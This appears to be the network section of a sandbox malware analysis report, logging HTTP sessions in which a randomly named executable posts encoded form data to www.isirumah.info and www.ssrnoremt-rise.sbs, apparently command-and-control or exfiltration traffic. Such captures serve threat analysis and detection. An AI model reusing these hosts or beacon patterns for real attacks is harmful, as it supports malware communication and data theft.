                                                                                                      Referer: http://www.isirumah.info/guxl/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 59 53 57 73 4c 44 4b 6e 7a 6c 48 4e 38 38 62 58 6a 42 4a 35 63 30 66 56 34 37 6c 34 38 79 2b 77 4b 61 30 77 6f 51 6a 42 50 63 47 6e 6e 58 41 56 30 6a 6d 44 45 42 70 43 36 4d 6e 7a 76 44 5a 64 77 39 41 56 5a 7a 39 2f 70 59 37 55 61 50 35 37 47 77 51 30 52 69 76 46 65 47 65 55 36 78 45 70 38 2b 68 78 74 6a 6b 39 47 79 74 6a 4e 59 35 6d 44 61 69 6c 4a 41 31 38 54 4f 7a 66 4e 78 48 73 72 69 46 73 43 64 70 77 62 47 6a 6f 63 46 51 6c 31 4d 4e 77 55 6b 74 39 37 33 59 4a 76 54 43 6d 61 69 54 33 35 72 66 63 55 35 63 2b 4c 74 2f 50 7a 38 48 57 4b 57 50 31 62 67 4e 7a 39 2f 4b 6e 75 56 43 4d 37 39 49 3d
                                                                                                      Data Ascii: 3Vh=YSWsLDKnzlHN88bXjBJ5c0fV47l48y+wKa0woQjBPcGnnXAV0jmDEBpC6MnzvDZdw9AVZz9/pY7UaP57GwQ0RivFeGeU6xEp8+hxtjk9GytjNY5mDailJA18TOzfNxHsriFsCdpwbGjocFQl1MNwUkt973YJvTCmaiT35rfcU5c+Lt/Pz8HWKWP1bgNz9/KnuVCM79I=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      26192.168.2.55000815.197.204.56801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:35.674618959 CET763OUTPOST /guxl/ HTTP/1.1
                                                                                                      Host: www.isirumah.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.isirumah.info
                                                                                                      Referer: http://www.isirumah.info/guxl/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 59 53 57 73 4c 44 4b 6e 7a 6c 48 4e 38 63 4c 58 68 69 52 35 49 6b 65 6e 33 62 6c 34 6d 43 2b 4b 4b 61 34 77 6f 56 62 52 50 76 79 6e 6b 33 77 56 33 68 43 44 49 68 70 43 78 73 6e 32 72 44 59 52 77 39 38 33 5a 32 64 2f 70 59 76 55 61 50 70 37 48 42 51 33 58 69 76 48 56 6d 65 57 77 52 45 70 38 2b 68 78 74 6a 77 45 47 78 64 6a 4e 73 46 6d 42 37 69 6d 4b 41 31 39 44 2b 7a 66 4a 78 48 53 72 69 46 4b 43 63 30 6c 62 45 62 6f 63 48 49 6c 31 64 4e 7a 62 6b 73 58 6d 6e 5a 6c 76 68 33 39 62 7a 44 4e 37 4b 36 6d 46 34 73 57 48 37 4f 6c 70 65 50 2b 5a 32 6a 4e 4c 7a 46 45 73 50 72 4f 30 32 53 38 6c 71 63 68 39 2f 61 76 35 67 79 32 6f 52 79 44 75 31 49 6f 73 65 5a 2b
                                                                                                      Data Ascii: 3Vh=YSWsLDKnzlHN8cLXhiR5Iken3bl4mC+KKa4woVbRPvynk3wV3hCDIhpCxsn2rDYRw983Z2d/pYvUaPp7HBQ3XivHVmeWwREp8+hxtjwEGxdjNsFmB7imKA19D+zfJxHSriFKCc0lbEbocHIl1dNzbksXmnZlvh39bzDN7K6mF4sWH7OlpeP+Z2jNLzFEsPrO02S8lqch9/av5gy2oRyDu1IoseZ+


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      27192.168.2.55000915.197.204.56801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:38.222404003 CET1780OUTPOST /guxl/ HTTP/1.1
                                                                                                      Host: www.isirumah.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.isirumah.info
                                                                                                      Referer: http://www.isirumah.info/guxl/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 59 53 57 73 4c 44 4b 6e 7a 6c 48 4e 38 63 4c 58 68 69 52 35 49 6b 65 6e 33 62 6c 34 6d 43 2b 4b 4b 61 34 77 6f 56 62 52 50 76 71 6e 6e 47 51 56 33 42 2b 44 4c 68 70 43 38 4d 6e 33 72 44 5a 4c 77 39 6b 7a 5a 32 41 4b 70 62 58 55 62 73 78 37 57 44 34 33 43 53 76 48 61 47 65 58 36 78 46 78 38 2b 78 31 74 6a 67 45 47 78 64 6a 4e 71 68 6d 46 71 69 6d 47 67 31 38 54 4f 7a 70 4e 78 48 70 72 6d 6f 2f 43 63 77 31 62 56 37 6f 66 6e 59 6c 35 50 56 7a 45 55 73 56 31 58 5a 39 76 68 72 59 62 7a 65 32 37 4b 65 63 46 2f 59 57 45 37 43 35 75 71 66 37 64 32 7a 53 48 54 35 4a 30 35 44 70 32 47 4f 6f 6e 35 38 73 77 73 47 38 32 46 71 71 72 69 6a 33 33 41 30 4e 38 62 6b 4b 66 69 6a 38 68 59 44 6d 51 75 66 63 65 41 78 35 6d 39 34 4e 75 75 53 4a 36 39 4b 68 35 2f 71 69 6a 71 33 4a 61 75 78 7a 41 6f 39 2b 76 4f 44 32 79 4d 62 73 4a 7a 4e 77 46 52 44 37 35 61 30 69 64 47 4c 2b 32 43 70 5a 59 49 55 37 2b 43 65 51 47 43 74 5a 65 46 2b 39 4a 54 6a 61 53 56 62 79 71 35 4d 69 39 37 42 71 4a 69 6b 6a 33 63 64 67 2f 38 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=YSWsLDKnzlHN8cLXhiR5Iken3bl4mC+KKa4woVbRPvqnnGQV3B+DLhpC8Mn3rDZLw9kzZ2AKpbXUbsx7WD43CSvHaGeX6xFx8+x1tjgEGxdjNqhmFqimGg18TOzpNxHprmo/Ccw1bV7ofnYl5PVzEUsV1XZ9vhrYbze27KecF/YWE7C5uqf7d2zSHT5J05Dp2GOon58swsG82Fqqrij33A0N8bkKfij8hYDmQufceAx5m94NuuSJ69Kh5/qijq3JauxzAo9+vOD2yMbsJzNwFRD75a0idGL+2CpZYIU7+CeQGCtZeF+9JTjaSVbyq5Mi97BqJikj3cdg/8GJRKDxnyImMX9wAm7OehtgrQHftJwiZ4rqJJUrQURasEn5uJDtN7rtwTz2pwuDwSjEfv8+1l2tyjaBE9rxs7YXB0/mjiN2/LjZNGDaZz+a6MSDVi1poKZNCwzmU2o3r+KeLuSnPRSYzI11ecce/L1Uu/C/JacdExuf7me9Ax3nZQXKt8AtyIOMFs+i0Doi45s/ojqaP+iWRLicy5wMBikCWtIzuP0WrsOod83TC/BFkATRpVzsy6hdi7CWlEXr/5yIFFawd20n3rskUzJdVTVdzgunLb0IlgDS/rXGDv2f7OSn61nsIIZjYuiLfGsSbny/RYCLplhn8tvc0kEHmL2cHSAHGE18cdO94I24ypMMUZDcS2VCHa5ugYMt1V4T4uy927iynPglDHy7sfheDS/gxPcS9peSx+7GztcLTFm6kL4QwL7doFPpAVvNNQCl0eAqL66HNgrjwEaClm2hInHLF/QX6FZ0F0TJ+0VxSKprZJPuyD8FOyzB+tGcXXnib/pMTdjs+lJ/bCvBdkv7rgd+914p+KP+Bqq9Andunv9+vodGUcCj6JA6G8P1nev1pVDIhY/dWDDwz4mVb1fKcn4WycjWTLxVIjhEJWb6YrYZjrOZDVU+aMh0fV73OcpkdtwkN7fiYymbsddpNtYkQCCtTaHn6Nwh+A+8 [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      28192.168.2.55001015.197.204.56801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:40.764621019 CET486OUTGET /guxl/?3Vh=VQ+MI0uxyUC67v7v1hceC1mX3dJlk0riHoAQ+3GvHNeFtXUu+z+ARRpD7cmGrTRyz64SdCAtvJHCLetkGUIMOH+WZ0Kd1BdS1tdCvwc6ShNqDahWH5yyFSR4U8rJOhuL/g==&GLvL=i6ILStp HTTP/1.1
                                                                                                      Host: www.isirumah.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:55:41.384526014 CET404INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 18 Nov 2024 12:55:41 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 264
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 56 68 3d 56 51 2b 4d 49 30 75 78 79 55 43 36 37 76 37 76 31 68 63 65 43 31 6d 58 33 64 4a 6c 6b 30 72 69 48 6f 41 51 2b 33 47 76 48 4e 65 46 74 58 55 75 2b 7a 2b 41 52 52 70 44 37 63 6d 47 72 54 52 79 7a 36 34 53 64 43 41 74 76 4a 48 43 4c 65 74 6b 47 55 49 4d 4f 48 2b 57 5a 30 4b 64 31 42 64 53 31 74 64 43 76 77 63 36 53 68 4e 71 44 61 68 57 48 35 79 79 46 53 52 34 55 38 72 4a 4f 68 75 4c 2f 67 3d 3d 26 47 4c 76 4c 3d 69 36 49 4c 53 74 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3Vh=VQ+MI0uxyUC67v7v1hceC1mX3dJlk0riHoAQ+3GvHNeFtXUu+z+ARRpD7cmGrTRyz64SdCAtvJHCLetkGUIMOH+WZ0Kd1BdS1tdCvwc6ShNqDahWH5yyFSR4U8rJOhuL/g==&GLvL=i6ILStp"}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      29192.168.2.550011188.114.97.3801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:46.453429937 CET758OUTPOST /3jsc/ HTTP/1.1
                                                                                                      Host: www.ssrnoremt-rise.sbs
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.ssrnoremt-rise.sbs
                                                                                                      Referer: http://www.ssrnoremt-rise.sbs/3jsc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 47 52 46 46 76 6c 70 48 35 6b 6f 4c 58 39 69 68 73 35 42 6c 4c 6f 53 34 72 59 34 75 67 33 57 54 64 61 2f 6c 6d 43 42 64 70 44 34 48 2b 70 6f 6f 6c 5a 74 2b 58 68 44 34 70 5a 4e 72 4c 7a 4f 68 38 4b 43 46 32 50 33 51 6b 34 73 76 43 6c 54 38 2f 50 69 31 48 76 4f 59 78 51 4e 61 72 2f 5a 6d 72 65 6c 48 79 4a 50 74 78 2f 32 76 50 32 6b 54 55 72 48 67 34 61 6a 63 30 4d 33 75 6f 36 68 79 38 57 34 55 71 57 41 50 73 6b 45 50 6b 5a 77 7a 43 76 41 4b 63 42 59 53 57 56 58 55 4f 79 6a 6e 61 67 43 2f 59 2f 37 69 68 65 62 50 4f 4e 70 55 61 46 55 35 57 57 74 5a 55 39 58 30 39 69 35 77 67 7a 69 4d 35 6c 63 3d
                                                                                                      Data Ascii: 3Vh=GRFFvlpH5koLX9ihs5BlLoS4rY4ug3WTda/lmCBdpD4H+poolZt+XhD4pZNrLzOh8KCF2P3Qk4svClT8/Pi1HvOYxQNar/ZmrelHyJPtx/2vP2kTUrHg4ajc0M3uo6hy8W4UqWAPskEPkZwzCvAKcBYSWVXUOyjnagC/Y/7ihebPONpUaFU5WWtZU9X09i5wgziM5lc=
                                                                                                      Nov 18, 2024 13:55:47.418620110 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:47 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HMnA4r2nXw6WlQpK8dbcV7253z3POErnGIEdYdJaDKXSJuoUByxnIFKx12Ou4g8YKXaQDPpDjCNwNKRhZGtKREBoBxmlZZQ0cL6lvFs%2BVhof4OoW2Yj67GrvYgLeMDPBgKrHrQmS9hVk"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e481de6986e6b2f-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1640&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                                      Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`5
                                                                                                      Nov 18, 2024 13:55:47.418767929 CET342INData Raw: ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2 fe 2f 1a 3b 46 1e 16 52 7d dd dd db
                                                                                                      Data Ascii: \Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak[[+


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      30192.168.2.550012188.114.97.3801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:49.003150940 CET778OUTPOST /3jsc/ HTTP/1.1
                                                                                                      Host: www.ssrnoremt-rise.sbs
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.ssrnoremt-rise.sbs
                                                                                                      Referer: http://www.ssrnoremt-rise.sbs/3jsc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 47 52 46 46 76 6c 70 48 35 6b 6f 4c 46 4e 79 68 2f 4f 74 6c 44 6f 53 37 6e 34 34 75 75 58 57 66 64 61 37 6c 6d 47 52 30 70 33 55 48 2b 4e 6b 6f 6b 64 35 2b 61 42 44 34 38 70 4e 75 46 54 4f 51 38 4b 4f 4e 32 50 4c 51 6b 34 34 76 43 6c 6a 38 2f 35 71 32 42 2f 4f 65 6b 41 4e 59 76 2f 5a 6d 72 65 6c 48 79 4e 76 54 78 2f 2b 76 50 46 38 54 4f 50 54 6a 77 36 6a 64 31 4d 33 75 2b 4b 68 32 38 57 34 36 71 54 38 70 73 6d 38 50 6b 64 67 7a 43 64 34 4a 48 78 59 51 59 31 57 6f 42 79 53 72 53 42 2b 4c 54 38 43 4c 38 2b 4c 6f 47 62 59 2b 41 6e 63 52 46 32 42 68 45 75 66 44 73 53 59 5a 36 51 79 38 6e 79 4a 70 43 35 44 6f 37 34 75 4e 6c 45 41 35 34 39 2b 38 78 52 62 37
                                                                                                      Data Ascii: 3Vh=GRFFvlpH5koLFNyh/OtlDoS7n44uuXWfda7lmGR0p3UH+Nkokd5+aBD48pNuFTOQ8KON2PLQk44vClj8/5q2B/OekANYv/ZmrelHyNvTx/+vPF8TOPTjw6jd1M3u+Kh28W46qT8psm8PkdgzCd4JHxYQY1WoBySrSB+LT8CL8+LoGbY+AncRF2BhEufDsSYZ6Qy8nyJpC5Do74uNlEA549+8xRb7
                                                                                                      Nov 18, 2024 13:55:49.915766954 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:49 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKdEhhiEIZicQifgDUOwgPYOTYRYZa8iEhqSlu6dC9zytsaFlLeQcYQx0KVvEkpAKydGZMUE%2B1JRbJNv%2ByP5kF4z5H7NiKjhTYaL7WTD2fNxQg90DrPq17jY0ucwnIjJYr5dieAfqL18"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e481df6896f0072-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1510&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                                      Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`
                                                                                                      Nov 18, 2024 13:55:49.915952921 CET339INData Raw: 86 35 ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2 fe 2f 1a 3b 46 1e 16 52 7d dd
                                                                                                      Data Ascii: 5\Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak[[+


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      31192.168.2.550013188.114.97.3801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:51.551079988 CET1795OUTPOST /3jsc/ HTTP/1.1
                                                                                                      Host: www.ssrnoremt-rise.sbs
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.ssrnoremt-rise.sbs
                                                                                                      Referer: http://www.ssrnoremt-rise.sbs/3jsc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 47 52 46 46 76 6c 70 48 35 6b 6f 4c 46 4e 79 68 2f 4f 74 6c 44 6f 53 37 6e 34 34 75 75 58 57 66 64 61 37 6c 6d 47 52 30 70 33 63 48 2b 34 34 6f 6c 2f 52 2b 62 42 44 34 39 70 4e 76 46 54 4f 4e 38 4a 2b 7a 32 50 48 41 6b 36 41 76 44 45 44 38 7a 63 4b 32 49 2f 4f 65 6d 41 4e 62 72 2f 5a 4a 72 65 31 44 79 4a 4c 54 78 2f 2b 76 50 45 4d 54 59 4c 48 6a 32 36 6a 63 30 4d 33 71 6f 36 68 53 38 56 4a 48 71 53 74 55 76 56 30 50 6c 38 4d 7a 5a 4f 41 4a 4c 78 59 65 49 6c 57 77 42 79 66 70 53 42 6a 30 54 39 6e 6d 38 38 72 6f 4d 66 38 70 48 58 55 4c 59 51 5a 33 4b 4d 66 49 36 33 38 44 6c 32 4b 38 6a 43 70 30 42 36 6a 67 36 64 61 2f 75 32 4e 71 6d 36 32 77 37 30 71 50 48 45 72 73 62 6f 6b 77 2f 35 34 4d 50 69 6c 4b 39 44 42 2f 61 33 44 4a 63 4f 6e 38 69 72 2b 38 53 47 34 32 34 45 56 36 4d 35 6f 67 4a 55 78 31 4e 6b 67 75 55 63 74 44 6e 43 4b 64 57 4f 2b 75 31 68 5a 32 59 76 4c 48 51 79 45 5a 44 2b 72 4b 69 72 4f 53 6e 74 69 4d 4c 65 36 38 6e 73 4e 53 6e 7a 30 55 66 77 70 4c 6a 63 4a 51 79 78 75 58 52 42 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=GRFFvlpH5koLFNyh/OtlDoS7n44uuXWfda7lmGR0p3cH+44ol/R+bBD49pNvFTON8J+z2PHAk6AvDED8zcK2I/OemANbr/ZJre1DyJLTx/+vPEMTYLHj26jc0M3qo6hS8VJHqStUvV0Pl8MzZOAJLxYeIlWwByfpSBj0T9nm88roMf8pHXULYQZ3KMfI638Dl2K8jCp0B6jg6da/u2Nqm62w70qPHErsbokw/54MPilK9DB/a3DJcOn8ir+8SG424EV6M5ogJUx1NkguUctDnCKdWO+u1hZ2YvLHQyEZD+rKirOSntiMLe68nsNSnz0UfwpLjcJQyxuXRBHjb/BgBSDvx1YmTWiWud36urWS0GunyuVwkAP09otoTk8/4mEtZKmHyzX+7Lpt2hhSlYQw1oFuMT9dcXaB/9x0VnBaHHcDQxmOIbqpIK6JFrXnQ+0zlwvnx5hJb5P+VjZr9RxfagOY6LxPS+wOuhgZSFkKswUDl71Fg+Nupc+soKN5MwCarRZ2qwh1eVjf4qnD97Yyo8696rKjWg1BnosUIORtkBMxSIRWFp56zd9w4xTdy6m8ZPN1ELIn1teTP7a6aZBJ4UHo9/pbrxiaD9B0B/kR1qoRHstlwzmXoqKmjwrrV7s9F+C2EEgu4V8rU2PCPQyvtoyn3RV4+NMsJ16VHzosxFzIlYV7XcLYWrmNUb8sYIBs/MvHhVUprIp6p9RvTX3QJUR/oLs1AJQ4WM0ZZl8dxGhTNWoV/BeT6hQSHObs3R/BeLwsnPqvy/VEvRnewMpadWWHW4cg2u5dGT85y1QflMpAkT500UZb6xFnX37tENM4pmcaEOmTaG5qs/y2UY1IFOUrjUjcgHprs/nQaQK20e5VEfTqAQaZ47gNHL8+SbSaiMveO03H1n+ZKZymMJ+9lFL9RCd1qQet//GBtvcTS1+nc+g+eL/zysgTbJAgG0wwv+UchGML2NEuo6uEoi+J0geORbIjCn3OGKS70TB8/ER/2hev 